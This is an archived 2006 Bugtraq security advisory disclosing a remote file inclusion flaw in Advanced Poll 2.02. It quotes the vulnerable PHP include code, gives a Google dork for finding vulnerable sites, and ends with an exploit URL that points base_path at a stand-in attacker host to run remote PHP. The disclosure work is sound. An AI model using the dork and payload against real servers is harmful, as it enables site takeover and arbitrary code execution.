lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060721083625.24871.qmail@securityfocus.com>
Date: 21 Jul 2006 08:36:25 -0000
From: chris_hasibuan@...oo.com
To: bugtraq@...urityfocus.com
Subject: SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path)
 Remote File Inclusion

#############################SolpotCrew Community################################ 
# 
# Advanced Poll ver 2.02 (base_path) Remote File Inclusion 
# 
# Vendor site : http://www.proxy2.de/scripts.php 
# 
################################################################################# 
# 
# 
# Bug Found By :Solpot a.k.a (k. Hasibuan) 
# 
# contact: chris_hasibuan@...oo.com 
# 
# Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt
# 
################################################################################ 
# 
# 
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja , 
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile
# and all crew #mardongan @ irc.dal.net 
# 
# 
############################################################################### 
Input passed to the "base_path" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources. 

code from /admin/common.inc.php 

$pollvars['SELF'] = basename($PHP_SELF); 
if (file_exists("$base_path/lang/$pollvars[lang]")) { 
include ("$base_path/lang/$pollvars[lang]"); 
} else { 
include ("$base_path/lang/english.php"); 

google dork : inurl:comments.php?action= send id 

EXPLOIT : 

http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker 

##############################MY LOVE JUST FOR U RIE######################### 
######################################E.O.F##################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ